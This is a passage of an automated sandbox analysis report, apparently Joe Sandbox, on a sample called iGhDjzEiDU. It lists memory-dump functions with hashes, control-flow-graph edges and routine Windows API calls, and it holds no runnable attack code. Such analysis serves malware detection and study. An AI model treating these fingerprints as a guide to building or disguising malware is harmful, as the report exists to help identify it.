7992d45-7992d48 507->510 508->504 508->507 510->469 510->504 511->483 512->483
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1715142645.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7990000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: Hhq$Hhq$Hhq$Hhq$Hhq
                                                                                                                                                                                                                                            • API String ID: 0-1427472961
                                                                                                                                                                                                                                            • Opcode ID: 4f0150a6fbf639c68f5dba3dc9957c380bfdfb9d102ab08132a1733b20f328c5
                                                                                                                                                                                                                                            • Instruction ID: a12c46276d90ed236a6957d2a20fe166483270968df1308c95351771375671c5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f0150a6fbf639c68f5dba3dc9957c380bfdfb9d102ab08132a1733b20f328c5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09328170A002199FEF54DFA8C8907AEBBF2BF84304F1485A9D409AB395EF349D45CB95
                                                                                                                                                                                                                                            Function 01327AA8 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1680898199.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1320000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: Ppdq
                                                                                                                                                                                                                                            • API String ID: 0-2552977383
                                                                                                                                                                                                                                            • Opcode ID: 8be9499b00191683c0a191a0387eeab9db295894e2c6c685488ad52873f9c938
                                                                                                                                                                                                                                            • Instruction ID: 514b1b7f5745b02703bcfee1fb5bf0f85712155ed80265ab08ff5bf9ac992700
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8be9499b00191683c0a191a0387eeab9db295894e2c6c685488ad52873f9c938
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D191A074E012189FCB15DFAAD984AADBBF2FF98310F20816AE418AB355DB346941CF41
                                                                                                                                                                                                                                            Function 01325E6C Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1680898199.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1320000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: Ppdq
                                                                                                                                                                                                                                            • API String ID: 0-2552977383
                                                                                                                                                                                                                                            • Opcode ID: a76ff7a5e872f7637d458646b6f4ef26ec6cb11a11ea1b8421b36e404d87003b
                                                                                                                                                                                                                                            • Instruction ID: c66e23237ec06c0521253bb2ec52a35dd8da02cf91b1d6736d81a9c70c433d3f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a76ff7a5e872f7637d458646b6f4ef26ec6cb11a11ea1b8421b36e404d87003b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4817274E002199FCB54DFAAD984A9EBBF2FF98310F208129E419AB355DB346945CF40
                                                                                                                                                                                                                                            Function 079733F0 Relevance: .7, Instructions: 668COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 798408a9161b6bd0217a299cb4c4f34716d879b61529d1b70059d475c9a8012e
                                                                                                                                                                                                                                            • Instruction ID: 3e2efc68fb556caebf054e7ee76f8042c83dd211517c0792295322126eac1b63
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 798408a9161b6bd0217a299cb4c4f34716d879b61529d1b70059d475c9a8012e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93523BB0600655CFCB54DF68C588A6DB7F2FF85318F6585A8E40A9B761DB30ED86CB40
                                                                                                                                                                                                                                            Function 079766BC Relevance: .6, Instructions: 648COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e1b0adca627bbe76ac7de5a34a51e4e28150ef1439146c8596f15d2eb29decae
                                                                                                                                                                                                                                            • Instruction ID: b1cb46f0f9076f9ae70059ca4be62310592f8698a4c43cfbf9e26f44e8b38152
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1b0adca627bbe76ac7de5a34a51e4e28150ef1439146c8596f15d2eb29decae
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97425AB0B002159FDB04DF68C884BAD77F2BF85314F2585A9E445EB3A1DB34AD46CBA1
                                                                                                                                                                                                                                            Function 05528728 Relevance: .6, Instructions: 588COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1700659197.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5520000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 74854747533089bdf7537a1dc438f0604707d1f416417d61e3d83f435e79a94b
                                                                                                                                                                                                                                            • Instruction ID: 9a491c1689065e998e84a04da53caa64aeef085184d03569137fc0a43fffbdf6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74854747533089bdf7537a1dc438f0604707d1f416417d61e3d83f435e79a94b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29526B34A003168FCB14DF68C844B98B7F2FF89314F2586A9D5586F3A1DB71A986CF81
                                                                                                                                                                                                                                            Function 05528718 Relevance: .6, Instructions: 574COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1700659197.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5520000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: d756410edb857cc40a58885d09de61103ae137fac2f692750ecbeb4c457ba27d
                                                                                                                                                                                                                                            • Instruction ID: 92cec1e2a3ff7deb9d27c6a99b53343fb306ca213ca7ffac93800cfb79da2ec2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d756410edb857cc40a58885d09de61103ae137fac2f692750ecbeb4c457ba27d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65525A34A003568FCB14DF68C844B98B7F2FF85314F2586A9D5586F3A1DB71AA86CF80
                                                                                                                                                                                                                                            Function 0797E752 Relevance: .4, Instructions: 382COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 5bd740297c334d376159e336dc0d3ce9910178fc3f59fa4f243e80a57674ae96
                                                                                                                                                                                                                                            • Instruction ID: 8c683708d617e3cac0e01beb56afee47d4b1f71c00517a98b534fb6537b3cb7a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bd740297c334d376159e336dc0d3ce9910178fc3f59fa4f243e80a57674ae96
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7812A675D0061ACFCB15DF68C880AD9F7B1FF99300F1586AAD859A7211EB70AAC5CF90
                                                                                                                                                                                                                                            Function 0797E760 Relevance: .4, Instructions: 382COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e474d3d6c529ac49473ad96731bc35684e3302b4a02729b80d1e51fd4a8dd42b
                                                                                                                                                                                                                                            • Instruction ID: a012a71cb9b3d292a4858e3bd920375c9246c67b6fd42542ba54c3bba685e4a5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e474d3d6c529ac49473ad96731bc35684e3302b4a02729b80d1e51fd4a8dd42b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2412B675D0061ACFCB15DF68C880AD9F7B1FF99304F1586AAD859A7211EB70AAC4CF90
                                                                                                                                                                                                                                            Function 079929C0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1715142645.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7990000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 72314d1161c8bca3aaee79468ffa495f69e26506525fe0a6ab925e0f8a37f753
                                                                                                                                                                                                                                            • Instruction ID: dcbb065a600d14baec10db7ab3f4c7595877af3bee3ffdc18a699615cad45343
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72314d1161c8bca3aaee79468ffa495f69e26506525fe0a6ab925e0f8a37f753
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46D16CB5E00219DFEF15CFA9C88079DBBB2BF88314F1485B9D409AB255EB34D985CB90
                                                                                                                                                                                                                                            Function 0132E080 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 513 132e080-132e10f GetCurrentProcess 517 132e111-132e117 513->517 518 132e118-132e14c GetCurrentThread 513->518 517->518 519 132e155-132e189 GetCurrentProcess 518->519 520 132e14e-132e154 518->520 522 132e192-132e1aa 519->522 523 132e18b-132e191 519->523 520->519 526 132e1b3-132e1e2 GetCurrentThreadId 522->526 523->522 527 132e1e4-132e1ea 526->527 528 132e1eb-132e24d 526->528 527->528
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0132E0FE
                                                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0132E13B
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0132E178
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0132E1D1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1680898199.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1320000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2063062207-0
                                                                                                                                                                                                                                            • Opcode ID: 4f6a4e308b3520755c9100cba20037b3055a0231d17c76aee9e1911ee49b7f53
                                                                                                                                                                                                                                            • Instruction ID: d4e510f1ffb0ef84c910ed71b79ed057578c693a1dcaca1f1085ef7c5c396084
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f6a4e308b3520755c9100cba20037b3055a0231d17c76aee9e1911ee49b7f53
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B15148B09012098FDB18DFAAD949BEEBFF1EF88314F24C469E409A7350D7346944CB65
                                                                                                                                                                                                                                            Function 0797FA7C Relevance: 5.3, Strings: 4, Instructions: 291COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 534 797fa7c-797fa83 535 797fa85-797fa95 534->535 536 797fa0e call 797de74 534->536 538 797fd23-797fd61 535->538 539 797fa9b-797faac call 7975630 535->539 540 797fa13-797fa16 536->540 569 797fcf9-797fd03 538->569 573 797fd63-797fd75 538->573 544 797fab2-797fabb call 7975798 539->544 545 797fca9-797fcad 539->545 553 797fad3-797fadb 544->553 554 797fabd-797fac3 544->554 548 797fcaf-797fcc1 545->548 549 797fcc9-797fcdb 545->549 548->549 556 797fcdd-797fce3 549->556 557 797fce9-797fced 549->557 560 797fae2-797fae5 553->560 561 797fadd-797fae0 553->561 558 797fac7-797fac9 554->558 559 797fac5 554->559 562 797fce7 556->562 563 797fce5 556->563 565 797fcef-797fcf7 557->565 566 797fd1b-797fd22 557->566 558->553 559->553 567 797fae8-797faf2 560->567 561->567 562->557 563->557 565->569 575 797faf4-797fafa 567->575 576 797fb00-797fb02 567->576 569->566 571 797fd05-797fd0c 569->571 571->566 574 797fd0e-797fd16 571->574 578 797fd77-797fd7c 573->578 579 797fdcc-797fdd4 573->579 574->566 580 797fafe 575->580 581 797fafc 575->581 576->545 577 797fb08-797fb11 call 7975798 576->577 587 797fb13-797fb19 577->587 588 797fb29-797fb31 577->588 578->579 583 797fd7e-797fd87 call 7976850 578->583 585 797fddc-797fddf 579->585 580->576 581->576 583->579 592 797fd89-797fd8d 583->592 590 797fb1d-797fb1f 587->590 591 797fb1b 587->591 593 797fb33-797fb36 588->593 594 797fb38-797fb3b 588->594 590->588 591->588 592->579 595 797fd8f-797fda2 call 7976850 592->595 596 797fb3e-797fb48 593->596 594->596 600 797fda4-797fda6 595->600 601 797fda8-797fdb9 595->601 602 797fb60-797fb7c call 7975548 596->602 603 797fb4a-797fb50 596->603 607 797fdbf-797fdc1 600->607 601->607 602->545 614 797fb82-797fba4 602->614 604 797fb54-797fb56 603->604 605 797fb52 603->605 604->602 605->602 607->579 608 797fdc3-797fdca 607->608 608->579 611 797fde0-797fe49 608->611 636 797fe50-797fe8f 611->636 637 797fe4b 611->637 617 797fba6-797fbbb call 797de64 614->617 618 797fbfb-797fc0c 614->618 626 797fbd5 617->626 627 797fbbd-797fbc1 617->627 623 797fc26 618->623 624 797fc0e-797fc24 618->624 629 797fc2b-797fc3a 623->629 624->629 628 797fbd7-797fbd9 626->628 627->626 630 797fbc3-797fbc7 627->630 628->618 633 797fbdb-797fbf6 call 7971228 628->633 634 797fc3c-797fc44 call 79766bc 629->634 635 797fc49-797fc4d 629->635 630->626 632 797fbc9-797fbd3 630->632 632->628 633->618 634->635 635->545 640 797fc4f-797fc72 call 79766cc 635->640 643 797fe96-797ff40 636->643 644 797fe91 636->644 637->636 646 797fc74-797fc8d call 79766cc 640->646 647 797fc92-797fc99 640->647 649 797ff47-797ff73 643->649 650 797ff42 643->650 644->643 646->647 647->545 651 797fc9b-797fca4 call 79766bc 647->651 657 797ff33-797ff34 649->657 650->649 651->545 658 797feb3-797feb7 657->658 659 797feeb-797fef5 658->659 660 797feb9-797fed1 658->660 661 797fef7 659->661 662 797fefc-797ff14 659->662 666 797fe77-797fe7c 660->666 667 797fed3-797fed4 660->667 661->662 663 797ff16-797ff23 662->663 664 797ff2d-797ff31 662->664 672 797fee5-797ff8a 663->672 664->657 664->658 666->663 669 797fe82-797fe83 666->669 667->666 669->663
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: Hhq$$dq$$dq$$dq
                                                                                                                                                                                                                                            • API String ID: 0-1693755344
                                                                                                                                                                                                                                            • Opcode ID: bc9356ada8485ac5e7e6afd751ca58d3fe994f5afb62aa6a4c31b736f5f58158
                                                                                                                                                                                                                                            • Instruction ID: 37f365ae75dedf4fbdc82dae407a78ef803a3e9a4ca4afc0585f31aa681f1a4f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc9356ada8485ac5e7e6afd751ca58d3fe994f5afb62aa6a4c31b736f5f58158
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1EA1D2B0700706CFDB24DE74C8907AA73A7AF85318F2489AAD815EB291DB75D883CB51
                                                                                                                                                                                                                                            Function 079932F8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 793 79932f8-799331d call 7991f64 796 799331f-799332f 793->796 797 7993332-79933c4 CreateIconFromResourceEx 793->797 801 79933cd-79933ea 797->801 802 79933c6-79933cc 797->802 802->801
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1715142645.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7990000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFromIconResource
                                                                                                                                                                                                                                            • String ID: o
                                                                                                                                                                                                                                            • API String ID: 3668623891-252678980
                                                                                                                                                                                                                                            • Opcode ID: 82dd72b9729c7cc1b3f99e44b44751a7e8db5c7706397926a35c81b90c80eb60
                                                                                                                                                                                                                                            • Instruction ID: 394e5511cfd3faf7d6507c64054ecb65b1a0e6758ca1e8bb8a5d39686485dcdf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82dd72b9729c7cc1b3f99e44b44751a7e8db5c7706397926a35c81b90c80eb60
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71318DB19043899FDB11CFAAD800AEEBFF9EF49314F14806AF954A7251C3359854DFA1
                                                                                                                                                                                                                                            Function 07978B81 Relevance: 2.8, Strings: 2, Instructions: 342COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 805 7978b81-7978b8c 806 7978b14-7978b7a 805->806 807 7978b8e-7978bc6 805->807 812 7978bcc-7978bdf call 79767c0 807->812 813 7978f89-7978fb4 807->813 818 7978bf3-7978c19 812->818 819 7978be1-7978beb 812->819 830 7978fbb-797900b 813->830 818->830 831 7978c1f-7978c35 call 79767d0 818->831 819->818 859 797900d-7979021 830->859 860 797902c-7979034 830->860 835 7978d17-7978d1b 831->835 836 7978c3b-7978c55 831->836 838 7978d1d-7978d23 835->838 839 7978d2b-7978d3b call 79767e0 835->839 844 7978c57-7978c65 836->844 845 7978c6d-7978c89 836->845 838->839 846 7978d72-7978dac call 79767f0 call 7975c28 839->846 847 7978d3d-7978d66 839->847 844->845 857 7978ce6-7978d0a 845->857 858 7978c8b-7978c96 845->858 867 7978dc4-7978de0 846->867 868 7978dae-7978dbc 846->868 875 7978d14 857->875 876 7978d0c 857->876 869 7978cae-7978cbf 858->869 870 7978c98-7978c9e 858->870 859->860 884 7978e54-7978e78 867->884 885 7978de2-7978ded 867->885 868->867 880 7978cc6-7978cc9 869->880 881 7978cc1-7978cc4 869->881 873 7978ca2-7978ca4 870->873 874 7978ca0 870->874 873->869 874->869 875->835 876->875 882 7978ccc-7978cd3 880->882 881->882 887 7978cd9-7978ce4 882->887 895 7978e82 884->895 896 7978e7a 884->896 891 7978e05-7978e12 885->891 892 7978def-7978df5 885->892 887->857 887->858 893 7978e26-7978e52 call 79728fc 891->893 894 7978e14-7978e20 891->894 897 7978df7 892->897 898 7978df9-7978dfb 892->898 893->884 893->885 894->893 895->813 896->895 897->891 898->891
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: PHdq$PHdq
                                                                                                                                                                                                                                            • API String ID: 0-1995607813
                                                                                                                                                                                                                                            • Opcode ID: 3b6e56cb2e1b54842c1c840179c4b322172c25ca725d53ac4b6defc0429ed9f3
                                                                                                                                                                                                                                            • Instruction ID: 7faf995d9ab5562ae1cdd158375c7467b9483d80b791e642237489ec9892da24
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b6e56cb2e1b54842c1c840179c4b322172c25ca725d53ac4b6defc0429ed9f3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7FD105B47002158FCB18DF68D598EA9BBF2BF89715B1545A9E406EB3A1CB31EC41CB90
                                                                                                                                                                                                                                            Function 0132590C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 013259C9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1680898199.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1320000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                                                                                            • Opcode ID: a585e58500bf7aecea40c9502b5be4b7760f75c7a485605911fac2cade846724
                                                                                                                                                                                                                                            • Instruction ID: cffc2447899165f686c8a20c18237b06441432d2db68890040ff1f5962acba4c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a585e58500bf7aecea40c9502b5be4b7760f75c7a485605911fac2cade846724
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E741F3B0D00729CBDF24DFAAC985BDDBBB5BF49318F20805AD408AB251DB756A45CF90
                                                                                                                                                                                                                                            Function 0132449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 013259C9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1680898199.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1320000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                                                                                            • Opcode ID: 634e00a253213d5eb67a9cfb3c2ecf10df0cb5cb1372e32030997395cb041b52
                                                                                                                                                                                                                                            • Instruction ID: 8deaf34349f1ceb23c6a0f6e983b374eedd844a778b3b6bff419cc066cf5e24e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 634e00a253213d5eb67a9cfb3c2ecf10df0cb5cb1372e32030997395cb041b52
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4241D2B0C0071DCBDB24DFA9C985BDEBBB5BF49314F20806AD408AB251DB756945CF90
                                                                                                                                                                                                                                            Function 01325A84 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1680898199.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1320000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 108d2abb2f4bb6bd039cb916c925d077edc97c0f7bb778b106f7d112f74d4ae6
                                                                                                                                                                                                                                            • Instruction ID: c098096c6ddd765cfc05a476b14e22cc4dcc9cef06c7c720bf3125ca6ec2494b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 108d2abb2f4bb6bd039cb916c925d077edc97c0f7bb778b106f7d112f74d4ae6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2331BDB1905368CFDF21EFA8C8457DDBBB1EF56318F24818AC405AB252C735AA46CB41
                                                                                                                                                                                                                                            Function 05527837 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05527917
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1700659197.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5520000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DrawText
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2175133113-0
                                                                                                                                                                                                                                            • Opcode ID: aa37c3b88d060fe8dc841153504d154a8117a34deb6c303e02d8a6d872c4b93e
                                                                                                                                                                                                                                            • Instruction ID: fd349b46fe6d8786b74b492fd6df771a630a547fa5b80020906a49c455c811ab
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa37c3b88d060fe8dc841153504d154a8117a34deb6c303e02d8a6d872c4b93e
